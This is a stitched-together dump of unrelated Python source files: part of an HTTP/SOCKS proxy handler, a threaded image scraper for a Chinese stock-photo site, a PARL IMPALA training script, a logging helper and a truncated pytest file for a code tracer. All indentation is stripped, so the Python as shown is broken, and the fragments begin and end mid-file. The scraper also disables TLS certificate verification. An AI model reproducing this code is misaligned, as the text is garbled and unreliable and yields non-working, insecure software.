# http://tools.ietf.org/html/rfc2616#section-13.5.1
hop_by_hop = (
'keep-alive',
'proxy-authenticate',
'proxy-authorization',
'proxy-connection',
'te',
'trailers',
'transfer-encoding',
)
for k in hop_by_hop:
del headers[k]
# Remove the `connection` header for non-websocket requests
if 'connection' in headers:
if 'upgrade' not in headers['connection'].lower():
del headers['connection']
# Accept only supported encodings
if 'Accept-Encoding' in headers:
ae = headers['Accept-Encoding']
if self.server.options.get('disable_encoding') is True:
permitted_encodings = ('identity', )
else:
permitted_encodings = ('identity', 'gzip', 'x-gzip', 'deflate')
filtered_encodings = [x for x in re.split(r',\s*', ae) if x in permitted_encodings]
if not filtered_encodings:
filtered_encodings.append('identity')
del headers['Accept-Encoding']
headers['Accept-Encoding'] = ', '.join(filtered_encodings)
return headers
def _keepalive(self):
return self.server.options.get('connection_keep_alive', False) \
and self.headers.get('Connection', '').lower() != 'close'
def _handle_websocket(self, server_sock):
self.connection.settimeout(None)
server_sock.settimeout(None)
def server_read():
try:
while True:
serverdata = server_sock.recv(4096)
if not serverdata:
break
self.connection.sendall(serverdata)
except socket.error:
self.log_message('Ending websocket server connection')
finally:
if server_sock:
server_sock.close()
if self.connection:
self.connection.close()
t = threading.Thread(target=server_read, daemon=True)
t.start()
try:
while True:
clientdata = self.connection.recv(4096)
if not clientdata:
break
server_sock.sendall(clientdata)
except socket.error:
self.log_message('Ending websocket client connection')
finally:
if server_sock:
server_sock.close()
if self.connection:
self.connection.close()
t.join()
def handle_one_request(self):
if not self.websocket:
super().handle_one_request()
def finish(self):
for conn in self.tls.conns.values():
if conn:
conn.close()
super().finish()
def handle_request(self, req, req_body):
"""Hook method that subclasses should override to process a request.
If the request body has been modified, it should be returned from the method.
Returning False will indicate that the response has been committed and no
further processing will take place.
Args:
req: A ProxyRequestHandler instance.
req_body: The request body as bytes.
"""
pass
def handle_response(self, req, req_body, res, res_body):
"""Hook method that subclasses should override to process a response.
If the response body has been modified, it should be returned from the method.
Args:
req: The original request - a ProxyRequestHandler instance.
req_body: The request body as bytes.
res: The response (a http.client.HTTPResponse instance) that corresponds to the
request.
res_body: The response body as bytes.
"""
pass
def commit_response(self, status, reason, headers, body, conn=None):
self.send_response(status, reason)
for header, val in headers.items():
self.send_header(header, val)
self.end_headers()
if body:
self.wfile.write(body)
self.wfile.flush()
if self.websocket and conn is not None:
self._handle_websocket(conn.sock)
self.close_connection = True
elif not self._keepalive():
self.close_connection = True
class ProxyAwareHTTPConnection(HTTPConnection):
"""A specialised HTTPConnection that will transparently connect to a
HTTP or SOCKS proxy server based on supplied proxy configuration.
"""
def __init__(self, proxy_config, netloc, *args, **kwargs):
self.proxy_config = proxy_config
self.netloc = netloc
self.use_proxy = 'http' in proxy_config and netloc not in proxy_config.get('no_proxy', '')
if self.use_proxy and proxy_config['http'].scheme.startswith('http'):
self.custom_authorization = proxy_config.get('custom_authorization')
super().__init__(proxy_config['http'].hostport, *args, **kwargs)
else:
super().__init__(netloc, *args, **kwargs)
def connect(self):
if self.use_proxy and self.proxy_config['http'].scheme.startswith('socks'):
self.sock = _socks_connection(
self.host,
self.port,
self.timeout,
self.proxy_config['http']
)
else:
super().connect()
def request(self, method, url, body=None, headers=None, *, encode_chunked=False):
if headers is None:
headers = {}
if self.use_proxy and self.proxy_config['http'].scheme.startswith('http'):
if not url.startswith('http'):
url = 'http://{}{}'.format(self.netloc, url)
headers.update(_create_auth_header(
self.proxy_config['http'].username,
self.proxy_config['http'].password,
self.custom_authorization)
)
super().request(method, url, body, headers=headers)
class ProxyAwareHTTPSConnection(HTTPSConnection):
"""A specialised HTTPSConnection that will transparently connect to a
HTTP or SOCKS proxy server based on supplied proxy configuration.
"""
def __init__(self, proxy_config, netloc, *args, **kwargs):
self.proxy_config = proxy_config
self.use_proxy = 'https' in proxy_config and netloc not in proxy_config.get('no_proxy', '')
if self.use_proxy and proxy_config['https'].scheme.startswith('http'):
# For HTTP proxies, CONNECT tunnelling is used
super().__init__(proxy_config['https'].hostport, *args, **kwargs)
self.set_tunnel(
netloc,
headers=_create_auth_header(
proxy_config['https'].username,
proxy_config['https'].password,
proxy_config.get('custom_authorization')
)
)
else:
super().__init__(netloc, *args, **kwargs)
def connect(self):
if self.use_proxy and self.proxy_config['https'].scheme.startswith('socks'):
self.sock = _socks_connection(
self.host,
self.port,
self.timeout,
self.proxy_config['https']
)
self.sock = self._context.wrap_socket(self.sock, server_hostname=self.host)
else:
super().connect()
def _create_auth_header(proxy_username, proxy_password, custom_proxy_authorization):
"""Create the Proxy-Authorization header based on the supplied username
and password or custom Proxy-Authorization header value.
Args:
proxy_username: The proxy username.
proxy_password: The proxy password.
custom_proxy_authorization: The custom proxy authorization.
Returns:
A dictionary containing the Proxy-Authorization header or an empty
dictionary if the username or password were not set.
"""
headers = {}
if proxy_username and proxy_password and not custom_proxy_authorization:
proxy_username = urllib.parse.unquote(proxy_username)
proxy_password = urllib.parse.unquote(proxy_password)
auth = '{}:{}'.format(proxy_username, proxy_password)
headers['Proxy-Authorization'] = 'Basic {}'.format(base64.b64encode(auth.encode('utf-8')).decode('utf-8'))
elif custom_proxy_authorization:
headers['Proxy-Authorization'] = custom_proxy_authorization
return headers
def _socks_connection(host, port, timeout, socks_config):
"""Create a SOCKS connection based on the supplied configuration."""
try:
socks_type = dict(
socks4=socks.PROXY_TYPE_SOCKS4,
socks5=socks.PROXY_TYPE_SOCKS5,
socks5h=socks.PROXY_TYPE_SOCKS5
)[socks_config.scheme]
except KeyError:
raise TypeError('Invalid SOCKS scheme: {}'.format(socks_config.scheme))
socks_host, socks_port = socks_config.hostport.split(':')
return socks.create_connection(
(host, port),
timeout,
None,
socks_type,
socks_host,
int(socks_port),
socks_config.scheme == 'socks5h',
socks_config.username,
socks_config.password,
((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),)
)
|
quanjingwang.py
|
# -*- coding:utf-8 -*-
# 多线程,自动创建文件夹,每个页面单独存储一个文件夹
import os
import queue
import re
import threading
import time
import requests
from bs4 import BeautifulSoup
string = 'https://www.quanjing.com/category/1286521/'
url_queue = queue.Queue()
pipei = re.compile('lowsrc="(.*?)" m=') #
def get_url(page):
for i in range(1, page + 1):
url = string + '{}.html'.format(i) # 更改网址拼接形式
url_queue.put(url)
# print(url_queue.queue)
def spider(url_queue):
url = url_queue.get()
floder_count = url[-7:-5]
if floder_count[0] == '/':
floder_name = floder_count[1]
else:
floder_name = floder_count
os.mkdir('第{0}页'.format(floder_name)) # mkdir只能创建一级目录,makedirs可以创建多级目录,可能是以参数中的‘/’分级
html = requests.get(url=url, verify=False).text
soup = BeautifulSoup(html, 'lxml')
ul = soup.find_all(attrs={"class": "gallery_list"})
# print(ul)
lianjies = re.findall(pipei, str(ul)) # 正则匹配必须是字符串类型
i = 1
for lianjie in lianjies:
# print(lianjie)
result = requests.get(url=lianjie, verify=False).content
with open('第{0}页\{1}.jpg'.format(floder_name, i), 'ab') as f:
f.write(result)
print('第{0}页第{1}张存储完成'.format(floder_name, i))
i += 1
if not url_queue.empty():
spider(url_queue)
def main():
queue_list = []
queue_count = 3
for i in range(queue_count):
t = threading.Thread(target=spider, args=(url_queue,))
queue_list.append(t)
for t in queue_list:
t.start()
for t in queue_list:
t.join()
if __name__ == '__main__':
page = int(input("请输入需要爬取的页数:"))
get_url(page)
start_time = time.time()
main()
print("test3用时:%f" % (time.time() - start_time))
|
train.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gym
import numpy as np
import os
import queue
import time
import threading
import parl
from atari_model import AtariModel
from atari_agent import AtariAgent
from parl.env.atari_wrappers import wrap_deepmind
from parl.utils import logger, tensorboard, get_gpu_count
from parl.utils.scheduler import PiecewiseScheduler
from parl.utils.time_stat import TimeStat
from parl.utils.window_stat import WindowStat
from parl.utils import machine_info
from actor import Actor
class Learner(object):
def __init__(self, config):
self.config = config
self.sample_data_queue = queue.Queue(
maxsize=config['sample_queue_max_size'])
#=========== Create Agent ==========
env = gym.make(config['env_name'])
env = wrap_deepmind(env, dim=config['env_dim'], obs_format='NCHW')
obs_shape = env.observation_space.shape
act_dim = env.action_space.n
model = AtariModel(act_dim)
algorithm = parl.algorithms.IMPALA(
model,
sample_batch_steps=self.config['sample_batch_steps'],
gamma=self.config['gamma'],
vf_loss_coeff=self.config['vf_loss_coeff'],
clip_rho_threshold=self.config['clip_rho_threshold'],
clip_pg_rho_threshold=self.config['clip_pg_rho_threshold'])
self.agent = AtariAgent(algorithm, obs_shape, act_dim,
self.learn_data_provider)
if machine_info.is_gpu_available():
assert get_gpu_count() == 1, 'Only support training in single GPU,\
Please set environment variable: `export CUDA_VISIBLE_DEVICES=[GPU_ID_TO_USE]` .'
self.cache_params = self.agent.get_weights()
self.params_lock = threading.Lock()
self.params_updated = False
self.cache_params_sent_cnt = 0
self.total_params_sync = 0
#========== Learner ==========
self.lr, self.entropy_coeff = None, None
self.lr_scheduler = PiecewiseScheduler(config['lr_scheduler'])
self.entropy_coeff_scheduler = PiecewiseScheduler(
config['entropy_coeff_scheduler'])
self.total_loss_stat = WindowStat(100)
self.pi_loss_stat = WindowStat(100)
self.vf_loss_stat = WindowStat(100)
self.entropy_stat = WindowStat(100)
self.kl_stat = WindowStat(100)
self.learn_time_stat = TimeStat(100)
self.start_time = None
self.learn_thread = threading.Thread(target=self.run_learn)
self.learn_thread.setDaemon(True)
self.learn_thread.start()
#========== Remote Actor ===========
self.remote_count = 0
self.batch_buffer = []
self.remote_metrics_queue = queue.Queue()
self.sample_total_steps = 0
self.create_actors()
def learn_data_provider(self):
""" Data generator for fluid.layers.py_reader
"""
while True:
sample_data = self.sample_data_queue.get()
self.sample_total_steps += sample_data['obs'].shape[0]
self.batch_buffer.append(sample_data)
buffer_size = sum(
[data['obs'].shape[0] for data in self.batch_buffer])
if buffer_size >= self.config['train_batch_size']:
batch = {}
for key in self.batch_buffer[0].keys():
batch[key] = np.concatenate(
[data[key] for data in self.batch_buffer])
self.batch_buffer = []
obs_np = batch['obs'].astype('float32')
actions_np = batch['actions'].astype('int64')
behaviour_logits_np = batch['behaviour_logits'].astype(
'float32')
rewards_np = batch['rewards'].astype('float32')
dones_np = batch['dones'].astype('float32')
self.lr = self.lr_scheduler.step()
self.entropy_coeff = self.entropy_coeff_scheduler.step()
yield [
obs_np, actions_np, behaviour_logits_np, rewards_np,
dones_np, self.lr, self.entropy_coeff
]
def run_learn(self):
""" Learn loop
"""
while True:
with self.learn_time_stat:
total_loss, pi_loss, vf_loss, entropy, kl = self.agent.learn()
self.params_updated = True
self.total_loss_stat.add(total_loss)
self.pi_loss_stat.add(pi_loss)
self.vf_loss_stat.add(vf_loss)
self.entropy_stat.add(entropy)
self.kl_stat.add(kl)
def create_actors(self):
""" Connect to the cluster and start sampling of the remote actor.
"""
parl.connect(self.config['master_address'])
logger.info('Waiting for {} remote actors to connect.'.format(
self.config['actor_num']))
for i in range(self.config['actor_num']):
self.remote_count += 1
logger.info('Remote actor count: {}'.format(self.remote_count))
if self.start_time is None:
self.start_time = time.time()
remote_thread = threading.Thread(target=self.run_remote_sample)
remote_thread.setDaemon(True)
remote_thread.start()
def run_remote_sample(self):
""" Sample data from remote actor and update parameters of remote actor.
"""
remote_actor = Actor(self.config)
cnt = 0
remote_actor.set_weights(self.cache_params)
while True:
batch = remote_actor.sample()
self.sample_data_queue.put(batch)
cnt += 1
if cnt % self.config['get_remote_metrics_interval'] == 0:
metrics = remote_actor.get_metrics()
if metrics:
self.remote_metrics_queue.put(metrics)
self.params_lock.acquire()
if self.params_updated and self.cache_params_sent_cnt >= self.config[
'params_broadcast_interval']:
self.params_updated = False
self.cache_params = self.agent.get_weights()
self.cache_params_sent_cnt = 0
self.cache_params_sent_cnt += 1
self.total_params_sync += 1
self.params_lock.release()
remote_actor.set_weights(self.cache_params)
def log_metrics(self):
""" Log metrics of learner and actors
"""
if self.start_time is None:
return
metrics = []
while True:
try:
metric = self.remote_metrics_queue.get_nowait()
metrics.append(metric)
except queue.Empty:
break
episode_rewards, episode_steps = [], []
for x in metrics:
episode_rewards.extend(x['episode_rewards'])
episode_steps.extend(x['episode_steps'])
max_episode_rewards, mean_episode_rewards, min_episode_rewards, \
max_episode_steps, mean_episode_steps, min_episode_steps =\
None, None, None, None, None, None
if episode_rewards:
mean_episode_rewards = np.mean(np.array(episode_rewards).flatten())
max_episode_rewards = np.max(np.array(episode_rewards).flatten())
min_episode_rewards = np.min(np.array(episode_rewards).flatten())
mean_episode_steps = np.mean(np.array(episode_steps).flatten())
max_episode_steps = np.max(np.array(episode_steps).flatten())
min_episode_steps = np.min(np.array(episode_steps).flatten())
metric = {
'Sample steps': self.sample_total_steps,
'max_episode_rewards': max_episode_rewards,
'mean_episode_rewards': mean_episode_rewards,
'min_episode_rewards': min_episode_rewards,
'max_episode_steps': max_episode_steps,
'mean_episode_steps': mean_episode_steps,
'min_episode_steps': min_episode_steps,
'sample_queue_size': self.sample_data_queue.qsize(),
'total_params_sync': self.total_params_sync,
'cache_params_sent_cnt': self.cache_params_sent_cnt,
'total_loss': self.total_loss_stat.mean,
'pi_loss': self.pi_loss_stat.mean,
'vf_loss': self.vf_loss_stat.mean,
'entropy': self.entropy_stat.mean,
'kl': self.kl_stat.mean,
'learn_time_s': self.learn_time_stat.mean,
'elapsed_time_s': int(time.time() - self.start_time),
'lr': self.lr,
'entropy_coeff': self.entropy_coeff,
}
for key, value in metric.items():
if value is not None:
tensorboard.add_scalar(key, value, self.sample_total_steps)
logger.info(metric)
if __name__ == '__main__':
from impala_config import config
learner = Learner(config)
assert config['log_metrics_interval_s'] > 0
while True:
time.sleep(config['log_metrics_interval_s'])
learner.log_metrics()
|
logger.py
|
import sys
import logging.handlers
import platform
import threading
import traceback
from . import compat
from . import handlers
try:
import notifiers.logging
_has_notifiers = True
except (ImportError, ModuleNotFoundError):
_has_notifiers = False
# register module-level functions for all supported notifiers
def _construct_notifier_func(provider_name):
def wrapper(level, **defaults):
if not _has_notifiers:
raise RuntimeError("the Notifiers package, required for the requested handler ("+provider_name+"), was not found. Make sure it is installed")
return add_handler(notifiers.logging.NotificationHandler, level, provider_name, defaults)
globals()["log_to_"+provider_name] = wrapper
wrapper.__name__ = "log_to_" + provider_name
wrapper.__doc__ = f"""Initializes a handler to send {provider_name} notifications for the requested level.
see the Notifiers docs for more info (including required parameters) at
https://notifiers.readthedocs.io/en/latest/providers/index.html"""
if _has_notifiers:
for provider in notifiers.all_providers():
# Mailgun support is currently implemented through another module
# as well as in Notifiers, and is thus excluded here
if provider == "mailgun":
continue
_construct_notifier_func(provider)
log = logging.getLogger()
DEFAULT_FMT = "%(levelname)s %(name)s - %(module)s.%(funcName)s (%(asctime)s) - %(threadName)s (%(thread)d):\n%(message)s"
DEFAULT_DATEFMT = "%Y-%m-%d %H:%M:%S"
exc_callback = None
def set_level(level, logger=None):
"""
Convenience function to set the logging level of the root (or optionally a custom) logger.
level must be an int or str
"""
if not logger:
logger = log
logger.setLevel(level)
def add_handler(cls, level, *args, **kwargs):
"""Add a handler to the route logger.
note: This function is only meant to be used when adding support for one shot invocation of new handlers.
In all other cases, you want log_to_*
args:
cls (subclass of logging.Handler): The handler class that is to be instantiated
level (int or str): The logging level (must be predefined)
args (list): Arguments that are to be passed to the handler
kwargs (dict): In all but a few cases, these keyword arguments are passed to the handler during initialization.
The following parameters may be specified for further customization and are subsequently not directly passed along.
fmt: the log formatter
datefmt: specify a specialized date format
returns:
logging.Handler
"""
fmt = kwargs.get("fmt")
datefmt = kwargs.get("datefmt")
if "fmt" in kwargs:
del kwargs["fmt"]
if "datefmt" in kwargs:
del kwargs["datefmt"]
fmt = fmt or DEFAULT_FMT
datefmt = datefmt or DEFAULT_DATEFMT
handler = cls(*args, **kwargs)
handler.setLevel(level)
formatter = logging.Formatter(fmt, datefmt)
handler.setFormatter(formatter)
log.addHandler(handler)
return handler
def log_to_stream(level, stream=None, *args, **kwargs):
return add_handler(logging.StreamHandler, level, stream=stream, *args, **kwargs)
def log_to_file(level, filename, *args, **kwargs):
return add_handler(logging.FileHandler, level, filename=filename, *args, **kwargs)
def log_to_rotating_file(level, filename, maxBytes=0, backupCount=0, *args, **kwargs):
return add_handler(logging.handlers.RotatingFileHandler, level, filename=filename, maxBytes=maxBytes, backupCount=backupCount, *args, **kwargs)
def log_to_timed_rotating_file(level, filename, when="h", interval=1, backupCount=0, *args, **kwargs):
return add_handler(logging.handlers.TimedRotatingFileHandler, level, filename=filename, when=when, interval=interval, backupCount=backupCount, *args, **kwargs)
def log_to_socket(level, host, port, *args, **kwargs):
return add_handler(logging.handlers.SocketHandler, level, host=host, port=port, *args, **kwargs)
def log_to_smtp(level, mailhost, fromaddr, toaddrs, subject, credentials=None, *args, **kwargs):
return add_handler(logging.handlers.SMTPHandler, level, mailhost=mailhost, fromaddr=fromaddr, toaddrs=toaddrs, subject=subject, credentials=credentials, *args, **kwargs)
def log_to_prowl(level, api_key, app_name, event, *args, **kwargs):
return add_handler(handlers.ProwlHandler, level, api_key=api_key, app_name=app_name, event=event, *args, **kwargs)
def log_to_mailgun(level, api_key, sender, to, subject=None, domain=None, *args, **kwargs):
# attempt parsing a domain from the sender
# if none was specified
if not domain:
if not ("<" in sender and ">" in sender):
return
domain = sender[sender.find("@"):sender.find(">")][1:]
return add_handler(handlers.MailgunHandler, level, api_key=api_key, domain=domain, sender=sender, to=to, subject=subject, *args, **kwargs)
def log_to_notifier(level, provider, defaults={}):
if not _has_notifiers:
log.warning("Attempted to register a third-party notification handler, but the notifiers package could not be found")
return
return add_handler(notifiers.logging.NotificationHandler, level, provider, defaults)
def _excepthook(exctype, value, traceback):
# ignore Ctrl+C in console applications
if issubclass(exctype, KeyboardInterrupt):
sys.__excepthook__(exctype, value, traceback)
return
# silently ignore SystemExit
if issubclass(exctype, SystemExit):
return
# fixme: all unhandled exceptions rightly report logger._excepthook as caller
# when it would actually be preferable to point to the erroneous module and funcname itself
log.error("Unhandled exception", exc_info=(exctype, value, traceback))
if callable(exc_callback):
exc_callback(exctype, value, traceback)
def _threaded_excepthook(args):
# ignore Ctrl+C in console applications
if issubclass(args.exc_type, KeyboardInterrupt):
return
# silently ignore SystemExit
if issubclass(args.exc_type, SystemExit):
return
# fixme: all unhandled exceptions rightly report logger._excepthook as caller
# when it would actually be preferable to point to the erroneous module and funcname itself
log.error("Unhandled exception", exc_info=(args.exc_type, args.exc_value, args.exc_traceback))
def log_unhandled_exceptions(callback=None):
"""Start logging all unhandled exceptions to registered handlers >= logging.ERROR.
If a callback function is specified it will be called every time an exception is processed, with parameters (exctype, value, traceback)
Typically used to notify other parts of the application (UI) or exit altogether.
"""
global exc_callback
if callback and callable(callback):
exc_callback = callback
sys.excepthook = _excepthook
def log_threaded_exceptions():
"""Start logging unhandled exceptions in threads other than the main one."""
threading.excepthook = _threaded_excepthook
def log_debug_info(level=logging.INFO):
log.log(level, "python version %s", sys.version)
log.log(level, "running on %s version %s", platform.system(), platform.version())
def init():
set_level(logging.DEBUG)
log_to_stream(logging.DEBUG)
log_to_file(logging.ERROR, "errors.log")
log_unhandled_exceptions()
log_threaded_exceptions()
log.debug("Initialized logging subsystem")
log_debug_info()
def shutdown():
logging.shutdown()
if __name__ == "__main__":
def error():
log.info("working on something")
0/0
import time
init()
#t = threading.Thread(target=error, daemon=True)
#t.start()
error()
time.sleep(0.5)
|
test_seeker.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import time
import sys
from executor.seeker.utils import truncate
import pytest
from executor import seeker
from executor.seeker.variables import needs_parentheses
from .utils import (
assert_output,
assert_sample_output,
VariableEntry,
CallEntry,
LineEntry,
ReturnEntry,
ReturnValueEntry,
ExceptionEntry,
ExceptionValueEntry,
SourcePathEntry,
CallEndedByExceptionEntry,
ElapsedTimeEntry,
)
from . import mini_toolbox
from importlib import import_module
@pytest.fixture()
def long_arr_value():
return (
"[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, "
"26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, "
"50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, "
"74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, "
"98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, "
"117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, "
"136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, "
"155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, "
"174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, "
"193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, "
"212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, "
"231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, "
"250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, "
"269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, "
"288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, "
"307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, "
"326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, "
"345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, "
"364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, "
"383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, "
"402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, "
"421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, "
"440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, "
"459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, "
"478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, "
"497, 498, 499, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, "
"516, 517, 518, 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531, 532, 533, 534, "
"535, 536, 537, 538, 539, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, "
"554, 555, 556, 557, 558, 559, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 570, 571, 572, "
"573, 574, 575, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 586, 587, 588, 589, 590, 591, "
"592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, "
"611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, "
"630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, "
"649, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 666, 667, "
"668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, 684, 685, 686, "
"687, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 698, 699, 700, 701, 702, 703, 704, 705, "
"706, 707, 708, 709, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 720, 721, 722, 723, 724, "
"725, 726, 727, 728, 729, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 740, 741, 742, 743, "
"744, 745, 746, 747, 748, 749, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 762, "
"763, 764, 765, 766, 767, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 780, 781, "
"782, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 794, 795, 796, 797, 798, 799, 800, "
"801, 802, 803, 804, 805, 806, 807, 808, 809, 810, 811, 812, 813, 814, 815, 816, 817, 818, 819, "
"820, 821, 822, 823, 824, 825, 826, 827, 828, 829, 830, 831, 832, 833, 834, 835, 836, 837, 838, "
"839, 840, 841, 842, 843, 844, 845, 846, 847, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, "
"858, 859, 860, 861, 862, 863, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 874, 875, 876, "
"877, 878, 879, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 890, 891, 892, 893, 894, 895, "
"896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 911, 912, 913, 914, "
"915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 930, 931, 932, 933, "
"934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, "
"953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, "
"972, 973, 974, 975, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 986, 987, 988, 989, 990, "
"991, 992, 993, 994, 995, 996, 997, 998, 999]"
)
def test_string_io_no_watch():
string_io = io.StringIO()
@seeker.tracer(output=string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
LineEntry("y = 8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_string_io_one_entry():
string_io = io.StringIO()
@seeker.tracer("foo", output=string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
LineEntry("y = 8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_string_io_multiple_entries():
string_io = io.StringIO()
@seeker.tracer("foo", "x", "y", output=string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_callable_watch_all():
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@seeker.tracer(only_watch=False, output=write)
def my_function(foo):
x = 7
y = 9
return y + x
result = my_function("beebeebooboo")
assert result == 16
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'beebeebooboo'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 9"),
VariableEntry("y", "9"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("16"),
ElapsedTimeEntry(),
),
)
def test_relative_time():
snoop = seeker.tracer(only_watch=False, relative_time=True)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
time.sleep(0.1)
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry("x", "2"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# In with in recursive call
VariableEntry("x", "1"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# Call to bar1 from if block outside with
VariableEntry("_x", "0"),
